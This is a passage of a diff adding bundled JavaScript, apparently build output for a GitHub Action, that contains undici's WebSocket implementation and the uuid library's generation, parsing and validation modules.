Otherwise, if urlRecord’s scheme is "https", set urlRecord’s scheme to "wss". + urlRecord.protocol = 'wss:' + } + + // 6. If urlRecord’s scheme is not "ws" or "wss", then throw a "SyntaxError" DOMException. + if (urlRecord.protocol !== 'ws:' && urlRecord.protocol !== 'wss:') { + throw new DOMException( + `Expected a ws: or wss: protocol, got ${urlRecord.protocol}`, + 'SyntaxError' + ) + } + + // 7. If urlRecord’s fragment is non-null, then throw a "SyntaxError" + // DOMException. + if (urlRecord.hash || urlRecord.href.endsWith('#')) { + throw new DOMException('Got fragment', 'SyntaxError') + } + + // 8. If protocols is a string, set protocols to a sequence consisting + // of just that string. + if (typeof protocols === 'string') { + protocols = [protocols] + } + + // 9. If any of the values in protocols occur more than once or otherwise + // fail to match the requirements for elements that comprise the value + // of `Sec-WebSocket-Protocol` fields as defined by The WebSocket + // protocol, then throw a "SyntaxError" DOMException. + if (protocols.length !== new Set(protocols.map(p => p.toLowerCase())).size) { + throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') + } + + if (protocols.length > 0 && !protocols.every(p => isValidSubprotocol(p))) { + throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') + } + + // 10. Set this's url to urlRecord. + this[kWebSocketURL] = new URL(urlRecord.href) + + // 11. Let client be this's relevant settings object. + + // 12. Run this step in parallel: + + // 1. Establish a WebSocket connection given urlRecord, protocols, + // and client. + this[kController] = establishWebSocketConnection( + urlRecord, + protocols, + this, + (response) => this.#onConnectionEstablished(response), + options + ) + + // Each WebSocket object has an associated ready state, which is a + // number representing the state of the connection. Initially it must + // be CONNECTING (0). 
+ this[kReadyState] = WebSocket.CONNECTING + + // The extensions attribute must initially return the empty string. + + // The protocol attribute must initially return the empty string. + + // Each WebSocket object has an associated binary type, which is a + // BinaryType. Initially it must be "blob". + this[kBinaryType] = 'blob' + } + + /** + * @see https://websockets.spec.whatwg.org/#dom-websocket-close + * @param {number|undefined} code + * @param {string|undefined} reason + */ + close (code = undefined, reason = undefined) { + webidl.brandCheck(this, WebSocket) + + if (code !== undefined) { + code = webidl.converters['unsigned short'](code, { clamp: true }) + } + + if (reason !== undefined) { + reason = webidl.converters.USVString(reason) + } + + // 1. If code is present, but is neither an integer equal to 1000 nor an + // integer in the range 3000 to 4999, inclusive, throw an + // "InvalidAccessError" DOMException. + if (code !== undefined) { + if (code !== 1000 && (code < 3000 || code > 4999)) { + throw new DOMException('invalid code', 'InvalidAccessError') + } + } + + let reasonByteLength = 0 + + // 2. If reason is present, then run these substeps: + if (reason !== undefined) { + // 1. Let reasonBytes be the result of encoding reason. + // 2. If reasonBytes is longer than 123 bytes, then throw a + // "SyntaxError" DOMException. + reasonByteLength = Buffer.byteLength(reason) + + if (reasonByteLength > 123) { + throw new DOMException( + `Reason must be less than 123 bytes; received ${reasonByteLength}`, + 'SyntaxError' + ) + } + } + + // 3. Run the first matching steps from the following list: + if (this[kReadyState] === WebSocket.CLOSING || this[kReadyState] === WebSocket.CLOSED) { + // If this's ready state is CLOSING (2) or CLOSED (3) + // Do nothing. + } else if (!isEstablished(this)) { + // If the WebSocket connection is not yet established + // Fail the WebSocket connection and set this's ready state + // to CLOSING (2). 
+ failWebsocketConnection(this, 'Connection was closed before it was established.') + this[kReadyState] = WebSocket.CLOSING + } else if (!isClosing(this)) { + // If the WebSocket closing handshake has not yet been started + // Start the WebSocket closing handshake and set this's ready + // state to CLOSING (2). + // - If neither code nor reason is present, the WebSocket Close + // message must not have a body. + // - If code is present, then the status code to use in the + // WebSocket Close message must be the integer given by code. + // - If reason is also present, then reasonBytes must be + // provided in the Close message after the status code. + + const frame = new WebsocketFrameSend() + + // If neither code nor reason is present, the WebSocket Close + // message must not have a body. + + // If code is present, then the status code to use in the + // WebSocket Close message must be the integer given by code. + if (code !== undefined && reason === undefined) { + frame.frameData = Buffer.allocUnsafe(2) + frame.frameData.writeUInt16BE(code, 0) + } else if (code !== undefined && reason !== undefined) { + // If reason is also present, then reasonBytes must be + // provided in the Close message after the status code. + frame.frameData = Buffer.allocUnsafe(2 + reasonByteLength) + frame.frameData.writeUInt16BE(code, 0) + // the body MAY contain UTF-8-encoded data with value /reason/ + frame.frameData.write(reason, 2, 'utf-8') + } else { + frame.frameData = emptyBuffer + } + + /** @type {import('stream').Duplex} */ + const socket = this[kResponse].socket + + socket.write(frame.createFrame(opcodes.CLOSE), (err) => { + if (!err) { + this[kSentClose] = true + } + }) + + // Upon either sending or receiving a Close control frame, it is said + // that _The WebSocket Closing Handshake is Started_ and that the + // WebSocket connection is in the CLOSING state. + this[kReadyState] = states.CLOSING + } else { + // Otherwise + // Set this's ready state to CLOSING (2). 
+ this[kReadyState] = WebSocket.CLOSING + } + } + + /** + * @see https://websockets.spec.whatwg.org/#dom-websocket-send + * @param {NodeJS.TypedArray|ArrayBuffer|Blob|string} data + */ + send (data) { + webidl.brandCheck(this, WebSocket) + + webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket.send' }) + + data = webidl.converters.WebSocketSendData(data) + + // 1. If this's ready state is CONNECTING, then throw an + // "InvalidStateError" DOMException. + if (this[kReadyState] === WebSocket.CONNECTING) { + throw new DOMException('Sent before connected.', 'InvalidStateError') + } + + // 2. Run the appropriate set of steps from the following list: + // https://datatracker.ietf.org/doc/html/rfc6455#section-6.1 + // https://datatracker.ietf.org/doc/html/rfc6455#section-5.2 + + if (!isEstablished(this) || isClosing(this)) { + return + } + + /** @type {import('stream').Duplex} */ + const socket = this[kResponse].socket + + // If data is a string + if (typeof data === 'string') { + // If the WebSocket connection is established and the WebSocket + // closing handshake has not yet started, then the user agent + // must send a WebSocket Message comprised of the data argument + // using a text frame opcode; if the data cannot be sent, e.g. + // because it would need to be buffered but the buffer is full, + // the user agent must flag the WebSocket as full and then close + // the WebSocket connection. Any invocation of this method with a + // string argument that does not throw an exception must increase + // the bufferedAmount attribute by the number of bytes needed to + // express the argument as UTF-8. 
+ + const value = Buffer.from(data) + const frame = new WebsocketFrameSend(value) + const buffer = frame.createFrame(opcodes.TEXT) + + this.#bufferedAmount += value.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= value.byteLength + }) + } else if (types.isArrayBuffer(data)) { + // If the WebSocket connection is established, and the WebSocket + // closing handshake has not yet started, then the user agent must + // send a WebSocket Message comprised of data using a binary frame + // opcode; if the data cannot be sent, e.g. because it would need + // to be buffered but the buffer is full, the user agent must flag + // the WebSocket as full and then close the WebSocket connection. + // The data to be sent is the data stored in the buffer described + // by the ArrayBuffer object. Any invocation of this method with an + // ArrayBuffer argument that does not throw an exception must + // increase the bufferedAmount attribute by the length of the + // ArrayBuffer in bytes. + + const value = Buffer.from(data) + const frame = new WebsocketFrameSend(value) + const buffer = frame.createFrame(opcodes.BINARY) + + this.#bufferedAmount += value.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= value.byteLength + }) + } else if (ArrayBuffer.isView(data)) { + // If the WebSocket connection is established, and the WebSocket + // closing handshake has not yet started, then the user agent must + // send a WebSocket Message comprised of data using a binary frame + // opcode; if the data cannot be sent, e.g. because it would need to + // be buffered but the buffer is full, the user agent must flag the + // WebSocket as full and then close the WebSocket connection. The + // data to be sent is the data stored in the section of the buffer + // described by the ArrayBuffer object that data references. 
Any + // invocation of this method with this kind of argument that does + // not throw an exception must increase the bufferedAmount attribute + // by the length of data’s buffer in bytes. + + const ab = Buffer.from(data, data.byteOffset, data.byteLength) + + const frame = new WebsocketFrameSend(ab) + const buffer = frame.createFrame(opcodes.BINARY) + + this.#bufferedAmount += ab.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= ab.byteLength + }) + } else if (isBlobLike(data)) { + // If the WebSocket connection is established, and the WebSocket + // closing handshake has not yet started, then the user agent must + // send a WebSocket Message comprised of data using a binary frame + // opcode; if the data cannot be sent, e.g. because it would need to + // be buffered but the buffer is full, the user agent must flag the + // WebSocket as full and then close the WebSocket connection. The data + // to be sent is the raw data represented by the Blob object. Any + // invocation of this method with a Blob argument that does not throw + // an exception must increase the bufferedAmount attribute by the size + // of the Blob object’s raw data, in bytes. + + const frame = new WebsocketFrameSend() + + data.arrayBuffer().then((ab) => { + const value = Buffer.from(ab) + frame.frameData = value + const buffer = frame.createFrame(opcodes.BINARY) + + this.#bufferedAmount += value.byteLength + socket.write(buffer, () => { + this.#bufferedAmount -= value.byteLength + }) + }) + } + } + + get readyState () { + webidl.brandCheck(this, WebSocket) + + // The readyState getter steps are to return this's ready state. + return this[kReadyState] + } + + get bufferedAmount () { + webidl.brandCheck(this, WebSocket) + + return this.#bufferedAmount + } + + get url () { + webidl.brandCheck(this, WebSocket) + + // The url getter steps are to return this's url, serialized. 
+ return URLSerializer(this[kWebSocketURL]) + } + + get extensions () { + webidl.brandCheck(this, WebSocket) + + return this.#extensions + } + + get protocol () { + webidl.brandCheck(this, WebSocket) + + return this.#protocol + } + + get onopen () { + webidl.brandCheck(this, WebSocket) + + return this.#events.open + } + + set onopen (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.open) { + this.removeEventListener('open', this.#events.open) + } + + if (typeof fn === 'function') { + this.#events.open = fn + this.addEventListener('open', fn) + } else { + this.#events.open = null + } + } + + get onerror () { + webidl.brandCheck(this, WebSocket) + + return this.#events.error + } + + set onerror (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.error) { + this.removeEventListener('error', this.#events.error) + } + + if (typeof fn === 'function') { + this.#events.error = fn + this.addEventListener('error', fn) + } else { + this.#events.error = null + } + } + + get onclose () { + webidl.brandCheck(this, WebSocket) + + return this.#events.close + } + + set onclose (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.close) { + this.removeEventListener('close', this.#events.close) + } + + if (typeof fn === 'function') { + this.#events.close = fn + this.addEventListener('close', fn) + } else { + this.#events.close = null + } + } + + get onmessage () { + webidl.brandCheck(this, WebSocket) + + return this.#events.message + } + + set onmessage (fn) { + webidl.brandCheck(this, WebSocket) + + if (this.#events.message) { + this.removeEventListener('message', this.#events.message) + } + + if (typeof fn === 'function') { + this.#events.message = fn + this.addEventListener('message', fn) + } else { + this.#events.message = null + } + } + + get binaryType () { + webidl.brandCheck(this, WebSocket) + + return this[kBinaryType] + } + + set binaryType (type) { + webidl.brandCheck(this, WebSocket) + + if (type !== 'blob' && type !== 
'arraybuffer') { + this[kBinaryType] = 'blob' + } else { + this[kBinaryType] = type + } + } + + /** + * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol + */ + #onConnectionEstablished (response) { + // processResponse is called when the "response’s header list has been received and initialized." + // once this happens, the connection is open + this[kResponse] = response + + const parser = new ByteParser(this) + parser.on('drain', function onParserDrain () { + this.ws[kResponse].socket.resume() + }) + + response.socket.ws = this + this[kByteParser] = parser + + // 1. Change the ready state to OPEN (1). + this[kReadyState] = states.OPEN + + // 2. Change the extensions attribute’s value to the extensions in use, if + // it is not the null value. + // https://datatracker.ietf.org/doc/html/rfc6455#section-9.1 + const extensions = response.headersList.get('sec-websocket-extensions') + + if (extensions !== null) { + this.#extensions = extensions + } + + // 3. Change the protocol attribute’s value to the subprotocol in use, if + // it is not the null value. + // https://datatracker.ietf.org/doc/html/rfc6455#section-1.9 + const protocol = response.headersList.get('sec-websocket-protocol') + + if (protocol !== null) { + this.#protocol = protocol + } + + // 4. Fire an event named open at the WebSocket object. 
+ fireEvent('open', this) + } +} + +// https://websockets.spec.whatwg.org/#dom-websocket-connecting +WebSocket.CONNECTING = WebSocket.prototype.CONNECTING = states.CONNECTING +// https://websockets.spec.whatwg.org/#dom-websocket-open +WebSocket.OPEN = WebSocket.prototype.OPEN = states.OPEN +// https://websockets.spec.whatwg.org/#dom-websocket-closing +WebSocket.CLOSING = WebSocket.prototype.CLOSING = states.CLOSING +// https://websockets.spec.whatwg.org/#dom-websocket-closed +WebSocket.CLOSED = WebSocket.prototype.CLOSED = states.CLOSED + +Object.defineProperties(WebSocket.prototype, { + CONNECTING: staticPropertyDescriptors, + OPEN: staticPropertyDescriptors, + CLOSING: staticPropertyDescriptors, + CLOSED: staticPropertyDescriptors, + url: kEnumerableProperty, + readyState: kEnumerableProperty, + bufferedAmount: kEnumerableProperty, + onopen: kEnumerableProperty, + onerror: kEnumerableProperty, + onclose: kEnumerableProperty, + close: kEnumerableProperty, + onmessage: kEnumerableProperty, + binaryType: kEnumerableProperty, + send: kEnumerableProperty, + extensions: kEnumerableProperty, + protocol: kEnumerableProperty, + [Symbol.toStringTag]: { + value: 'WebSocket', + writable: false, + enumerable: false, + configurable: true + } +}) + +Object.defineProperties(WebSocket, { + CONNECTING: staticPropertyDescriptors, + OPEN: staticPropertyDescriptors, + CLOSING: staticPropertyDescriptors, + CLOSED: staticPropertyDescriptors +}) + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.DOMString +) + +webidl.converters['DOMString or sequence'] = function (V) { + if (webidl.util.Type(V) === 'Object' && Symbol.iterator in V) { + return webidl.converters['sequence'](V) + } + + return webidl.converters.DOMString(V) +} + +// This implements the propsal made in https://github.com/whatwg/websockets/issues/42 +webidl.converters.WebSocketInit = webidl.dictionaryConverter([ + { + key: 'protocols', + converter: webidl.converters['DOMString or sequence'], + 
get defaultValue () { + return [] + } + }, + { + key: 'dispatcher', + converter: (V) => V, + get defaultValue () { + return getGlobalDispatcher() + } + }, + { + key: 'headers', + converter: webidl.nullableConverter(webidl.converters.HeadersInit) + } +]) + +webidl.converters['DOMString or sequence or WebSocketInit'] = function (V) { + if (webidl.util.Type(V) === 'Object' && !(Symbol.iterator in V)) { + return webidl.converters.WebSocketInit(V) + } + + return { protocols: webidl.converters['DOMString or sequence'](V) } +} + +webidl.converters.WebSocketSendData = function (V) { + if (webidl.util.Type(V) === 'Object') { + if (isBlobLike(V)) { + return webidl.converters.Blob(V, { strict: false }) + } + + if (ArrayBuffer.isView(V) || types.isAnyArrayBuffer(V)) { + return webidl.converters.BufferSource(V) + } + } + + return webidl.converters.USVString(V) +} + +module.exports = { + WebSocket +} + + +/***/ }), + +/***/ 5840: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +Object.defineProperty(exports, "v1", ({ + enumerable: true, + get: function () { + return _v.default; + } +})); +Object.defineProperty(exports, "v3", ({ + enumerable: true, + get: function () { + return _v2.default; + } +})); +Object.defineProperty(exports, "v4", ({ + enumerable: true, + get: function () { + return _v3.default; + } +})); +Object.defineProperty(exports, "v5", ({ + enumerable: true, + get: function () { + return _v4.default; + } +})); +Object.defineProperty(exports, "NIL", ({ + enumerable: true, + get: function () { + return _nil.default; + } +})); +Object.defineProperty(exports, "version", ({ + enumerable: true, + get: function () { + return _version.default; + } +})); +Object.defineProperty(exports, "validate", ({ + enumerable: true, + get: function () { + return _validate.default; + } +})); +Object.defineProperty(exports, "stringify", ({ + enumerable: true, + get: function () { 
+ return _stringify.default; + } +})); +Object.defineProperty(exports, "parse", ({ + enumerable: true, + get: function () { + return _parse.default; + } +})); + +var _v = _interopRequireDefault(__nccwpck_require__(8628)); + +var _v2 = _interopRequireDefault(__nccwpck_require__(6409)); + +var _v3 = _interopRequireDefault(__nccwpck_require__(5122)); + +var _v4 = _interopRequireDefault(__nccwpck_require__(9120)); + +var _nil = _interopRequireDefault(__nccwpck_require__(5332)); + +var _version = _interopRequireDefault(__nccwpck_require__(1595)); + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +var _parse = _interopRequireDefault(__nccwpck_require__(2746)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +/***/ }), + +/***/ 4569: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } + +function md5(bytes) { + if (Array.isArray(bytes)) { + bytes = Buffer.from(bytes); + } else if (typeof bytes === 'string') { + bytes = Buffer.from(bytes, 'utf8'); + } + + return _crypto.default.createHash('md5').update(bytes).digest(); +} + +var _default = md5; +exports["default"] = _default; + +/***/ }), + +/***/ 5332: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; +var _default = '00000000-0000-0000-0000-000000000000'; +exports["default"] = _default; + +/***/ }), + +/***/ 2746: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function parse(uuid) { + if (!(0, _validate.default)(uuid)) { + throw TypeError('Invalid UUID'); + } + + let v; + const arr = new Uint8Array(16); // Parse ########-....-....-....-............ + + arr[0] = (v = parseInt(uuid.slice(0, 8), 16)) >>> 24; + arr[1] = v >>> 16 & 0xff; + arr[2] = v >>> 8 & 0xff; + arr[3] = v & 0xff; // Parse ........-####-....-....-............ + + arr[4] = (v = parseInt(uuid.slice(9, 13), 16)) >>> 8; + arr[5] = v & 0xff; // Parse ........-....-####-....-............ + + arr[6] = (v = parseInt(uuid.slice(14, 18), 16)) >>> 8; + arr[7] = v & 0xff; // Parse ........-....-....-####-............ 
+ + arr[8] = (v = parseInt(uuid.slice(19, 23), 16)) >>> 8; + arr[9] = v & 0xff; // Parse ........-....-....-....-############ + // (Use "/" to avoid 32-bit truncation when bit-shifting high-order bytes) + + arr[10] = (v = parseInt(uuid.slice(24, 36), 16)) / 0x10000000000 & 0xff; + arr[11] = v / 0x100000000 & 0xff; + arr[12] = v >>> 24 & 0xff; + arr[13] = v >>> 16 & 0xff; + arr[14] = v >>> 8 & 0xff; + arr[15] = v & 0xff; + return arr; +} + +var _default = parse; +exports["default"] = _default; + +/***/ }), + +/***/ 814: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; +var _default = /^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i; +exports["default"] = _default; + +/***/ }), + +/***/ 807: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = rng; + +var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +const rnds8Pool = new Uint8Array(256); // # of random values to pre-allocate + +let poolPtr = rnds8Pool.length; + +function rng() { + if (poolPtr > rnds8Pool.length - 16) { + _crypto.default.randomFillSync(rnds8Pool); + + poolPtr = 0; + } + + return rnds8Pool.slice(poolPtr, poolPtr += 16); +} + +/***/ }), + +/***/ 5274: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } + +function sha1(bytes) { + if (Array.isArray(bytes)) { + bytes = Buffer.from(bytes); + } else if (typeof bytes === 'string') { + bytes = Buffer.from(bytes, 'utf8'); + } + + return _crypto.default.createHash('sha1').update(bytes).digest(); +} + +var _default = sha1; +exports["default"] = _default; + +/***/ }), + +/***/ 8950: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _validate = _interopRequireDefault(__nccwpck_require__(6900)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +/** + * Convert array of 16 byte values to UUID string format of the form: + * XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX + */ +const byteToHex = []; + +for (let i = 0; i < 256; ++i) { + byteToHex.push((i + 0x100).toString(16).substr(1)); +} + +function stringify(arr, offset = 0) { + // Note: Be careful editing this code! It's been tuned for performance + // and works in ways you may not expect. See https://github.com/uuidjs/uuid/pull/434 + const uuid = (byteToHex[arr[offset + 0]] + byteToHex[arr[offset + 1]] + byteToHex[arr[offset + 2]] + byteToHex[arr[offset + 3]] + '-' + byteToHex[arr[offset + 4]] + byteToHex[arr[offset + 5]] + '-' + byteToHex[arr[offset + 6]] + byteToHex[arr[offset + 7]] + '-' + byteToHex[arr[offset + 8]] + byteToHex[arr[offset + 9]] + '-' + byteToHex[arr[offset + 10]] + byteToHex[arr[offset + 11]] + byteToHex[arr[offset + 12]] + byteToHex[arr[offset + 13]] + byteToHex[arr[offset + 14]] + byteToHex[arr[offset + 15]]).toLowerCase(); // Consistency check for valid UUID. 
If this throws, it's likely due to one + // of the following: + // - One or more input array values don't map to a hex octet (leading to + // "undefined" in the uuid) + // - Invalid input values for the RFC `version` or `variant` fields + + if (!(0, _validate.default)(uuid)) { + throw TypeError('Stringified UUID is invalid'); + } + + return uuid; +} + +var _default = stringify; +exports["default"] = _default; + +/***/ }), + +/***/ 8628: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _rng = _interopRequireDefault(__nccwpck_require__(807)); + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +// **`v1()` - Generate time-based UUID** +// +// Inspired by https://github.com/LiosK/UUID.js +// and http://docs.python.org/library/uuid.html +let _nodeId; + +let _clockseq; // Previous uuid creation time + + +let _lastMSecs = 0; +let _lastNSecs = 0; // See https://github.com/uuidjs/uuid for API details + +function v1(options, buf, offset) { + let i = buf && offset || 0; + const b = buf || new Array(16); + options = options || {}; + let node = options.node || _nodeId; + let clockseq = options.clockseq !== undefined ? options.clockseq : _clockseq; // node and clockseq need to be initialized to random values if they're not + // specified. We do this lazily to minimize issues related to insufficient + // system entropy. 
See #189 + + if (node == null || clockseq == null) { + const seedBytes = options.random || (options.rng || _rng.default)(); + + if (node == null) { + // Per 4.5, create and 48-bit node id, (47 random bits + multicast bit = 1) + node = _nodeId = [seedBytes[0] | 0x01, seedBytes[1], seedBytes[2], seedBytes[3], seedBytes[4], seedBytes[5]]; + } + + if (clockseq == null) { + // Per 4.2.2, randomize (14 bit) clockseq + clockseq = _clockseq = (seedBytes[6] << 8 | seedBytes[7]) & 0x3fff; + } + } // UUID timestamps are 100 nano-second units since the Gregorian epoch, + // (1582-10-15 00:00). JSNumbers aren't precise enough for this, so + // time is handled internally as 'msecs' (integer milliseconds) and 'nsecs' + // (100-nanoseconds offset from msecs) since unix epoch, 1970-01-01 00:00. + + + let msecs = options.msecs !== undefined ? options.msecs : Date.now(); // Per 4.2.1.2, use count of uuid's generated during the current clock + // cycle to simulate higher resolution clock + + let nsecs = options.nsecs !== undefined ? 
options.nsecs : _lastNSecs + 1; // Time since last uuid creation (in msecs) + + const dt = msecs - _lastMSecs + (nsecs - _lastNSecs) / 10000; // Per 4.2.1.2, Bump clockseq on clock regression + + if (dt < 0 && options.clockseq === undefined) { + clockseq = clockseq + 1 & 0x3fff; + } // Reset nsecs if clock regresses (new clockseq) or we've moved onto a new + // time interval + + + if ((dt < 0 || msecs > _lastMSecs) && options.nsecs === undefined) { + nsecs = 0; + } // Per 4.2.1.2 Throw error if too many uuids are requested + + + if (nsecs >= 10000) { + throw new Error("uuid.v1(): Can't create more than 10M uuids/sec"); + } + + _lastMSecs = msecs; + _lastNSecs = nsecs; + _clockseq = clockseq; // Per 4.1.4 - Convert from unix epoch to Gregorian epoch + + msecs += 12219292800000; // `time_low` + + const tl = ((msecs & 0xfffffff) * 10000 + nsecs) % 0x100000000; + b[i++] = tl >>> 24 & 0xff; + b[i++] = tl >>> 16 & 0xff; + b[i++] = tl >>> 8 & 0xff; + b[i++] = tl & 0xff; // `time_mid` + + const tmh = msecs / 0x100000000 * 10000 & 0xfffffff; + b[i++] = tmh >>> 8 & 0xff; + b[i++] = tmh & 0xff; // `time_high_and_version` + + b[i++] = tmh >>> 24 & 0xf | 0x10; // include version + + b[i++] = tmh >>> 16 & 0xff; // `clock_seq_hi_and_reserved` (Per 4.2.2 - include variant) + + b[i++] = clockseq >>> 8 | 0x80; // `clock_seq_low` + + b[i++] = clockseq & 0xff; // `node` + + for (let n = 0; n < 6; ++n) { + b[i + n] = node[n]; + } + + return buf || (0, _stringify.default)(b); +} + +var _default = v1; +exports["default"] = _default; + +/***/ }), + +/***/ 6409: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _v = _interopRequireDefault(__nccwpck_require__(5998)); + +var _md = _interopRequireDefault(__nccwpck_require__(4569)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } + +const v3 = (0, _v.default)('v3', 0x30, _md.default); +var _default = v3; +exports["default"] = _default; + +/***/ }), + +/***/ 5998: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = _default; +exports.URL = exports.DNS = void 0; + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +var _parse = _interopRequireDefault(__nccwpck_require__(2746)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +function stringToBytes(str) { + str = unescape(encodeURIComponent(str)); // UTF8 escape + + const bytes = []; + + for (let i = 0; i < str.length; ++i) { + bytes.push(str.charCodeAt(i)); + } + + return bytes; +} + +const DNS = '6ba7b810-9dad-11d1-80b4-00c04fd430c8'; +exports.DNS = DNS; +const URL = '6ba7b811-9dad-11d1-80b4-00c04fd430c8'; +exports.URL = URL; + +function _default(name, version, hashfunc) { + function generateUUID(value, namespace, buf, offset) { + if (typeof value === 'string') { + value = stringToBytes(value); + } + + if (typeof namespace === 'string') { + namespace = (0, _parse.default)(namespace); + } + + if (namespace.length !== 16) { + throw TypeError('Namespace must be array-like (16 iterable integer values, 0-255)'); + } // Compute hash of namespace and value, Per 4.3 + // Future: Use spread syntax when supported on all platforms, e.g. `bytes = + // hashfunc([...namespace, ... 
value])` + + + let bytes = new Uint8Array(16 + value.length); + bytes.set(namespace); + bytes.set(value, namespace.length); + bytes = hashfunc(bytes); + bytes[6] = bytes[6] & 0x0f | version; + bytes[8] = bytes[8] & 0x3f | 0x80; + + if (buf) { + offset = offset || 0; + + for (let i = 0; i < 16; ++i) { + buf[offset + i] = bytes[i]; + } + + return buf; + } + + return (0, _stringify.default)(bytes); + } // Function#name is not settable on some platforms (#270) + + + try { + generateUUID.name = name; // eslint-disable-next-line no-empty + } catch (err) {} // For CommonJS default export support + + + generateUUID.DNS = DNS; + generateUUID.URL = URL; + return generateUUID; +} + +/***/ }), + +/***/ 5122: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _rng = _interopRequireDefault(__nccwpck_require__(807)); + +var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
obj : { default: obj }; } + +function v4(options, buf, offset) { + options = options || {}; + + const rnds = options.random || (options.rng || _rng.default)(); // Per 4.4, set bits for version and `clock_seq_hi_and_reserved` + + + rnds[6] = rnds[6] & 0x0f | 0x40; + rnds[8] = rnds[8] & 0x3f | 0x80; // Copy bytes to buffer, if provided + + if (buf) { + offset = offset || 0; + + for (let i = 0; i < 16; ++i) { + buf[offset + i] = rnds[i]; + } + + return buf; + } + + return (0, _stringify.default)(rnds); +} + +var _default = v4; +exports["default"] = _default; + +/***/ }), + +/***/ 9120: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _v = _interopRequireDefault(__nccwpck_require__(5998)); + +var _sha = _interopRequireDefault(__nccwpck_require__(5274)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } + +const v5 = (0, _v.default)('v5', 0x50, _sha.default); +var _default = v5; +exports["default"] = _default; + +/***/ }), + +/***/ 6900: +/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { + +"use strict"; + + +Object.defineProperty(exports, "__esModule", ({ + value: true +})); +exports["default"] = void 0; + +var _regex = _interopRequireDefault(__nccwpck_require__(814)); + +function _interopRequireDefault(obj) { return obj && obj.__esModule ? 
